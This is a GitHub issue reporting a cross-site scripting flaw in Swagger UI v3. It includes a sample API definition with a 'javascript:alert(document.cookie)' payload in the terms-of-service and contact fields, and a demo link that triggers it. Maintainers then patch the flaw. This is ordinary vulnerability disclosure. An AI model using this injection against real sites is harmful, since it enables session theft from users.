Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

XSS Vulnerability with Swagger UI v3 #3847

Closed
dexwiz opened this issue Oct 30, 2017 · 1 comment
Closed

XSS Vulnerability with Swagger UI v3 #3847

dexwiz opened this issue Oct 30, 2017 · 1 comment
Labels
cat: security locked-by: lock-bot P0 type: bug version: 3.x

Comments

@dexwiz
Copy link

dexwiz commented Oct 30, 2017

Q A
Bug or feature request? Bug
Which Swagger/OpenAPI version? 2
Which Swagger-UI version? 3.x
How did you install Swagger-UI? Vendered Distrobution
Which browser & version? Chrome, Safari
Which operating system? -

Demonstration API definition

Javascript can be injected into the Terms of Service link at the top of the page using javascript in the termsOfServiceField.

swagger: "2.0",
info: 
  title: "Swagger Sample App",
  description: "Please to click Terms of service"
  termsOfService: "javascript:alert(document.cookie)"
  contact: 
    name: "API Support",
    url: "javascript:alert(document.cookie)",
    email: "javascript:alert(document.cookie)"
  version: "1.0.1"

Example

This vulnerability can be tested on the example petstore site. Upon loading, clicking the Terms of Service link will execute the malicious script.

http://petstore.swagger.io/?url=https://gist.githubusercontent.com/dileepdasari/7120f06a4bcfd56d6d7572a6dc1c6309/raw/7a5f5d548a3e68afc5122c51bcf9d33a47830819/xsstest.json
@shockey shockey mentioned this issue Oct 31, 2017
Merged
10 tasks
@shockey
Copy link
Contributor

shockey commented Oct 31, 2017

I just patched this, and will release a new version shortly.

Thanks for the report, @dexwiz! In the future, please direct security issues to security@swagger.io instead of our issue tracker, as noted in the README 😄

@shockey shockey closed this as completed Oct 31, 2017
@nekloth nekloth mentioned this issue Mar 7, 2018
Closed
@shockey shockey mentioned this issue Sep 13, 2018
Closed
@nabdelgadir nabdelgadir mentioned this issue Feb 7, 2019
Closed
2 tasks
alokmenghrajani added a commit to square/keywhiz that referenced this issue Mar 14, 2019
@alokmenghrajani
Nuke docs
e8eb2bb 
Swagger has a XSS
(swagger-api/swagger-ui#3847) and this is the
easiest way to fix things since we don't really care about the API docs.
@alokmenghrajani alokmenghrajani mentioned this issue Mar 14, 2019
Merged
alokmenghrajani added a commit to square/keywhiz that referenced this issue Mar 14, 2019
@alokmenghrajani
Nuke docs
119c6f8 
Swagger has a XSS
(swagger-api/swagger-ui#3847) and this is the
easiest way to fix things since we don't really care about the API docs.
@lock lock bot locked and limited conversation to collaborators Jul 2, 2019
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
cat: security locked-by: lock-bot P0 type: bug version: 3.x
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@shockey @dexwiz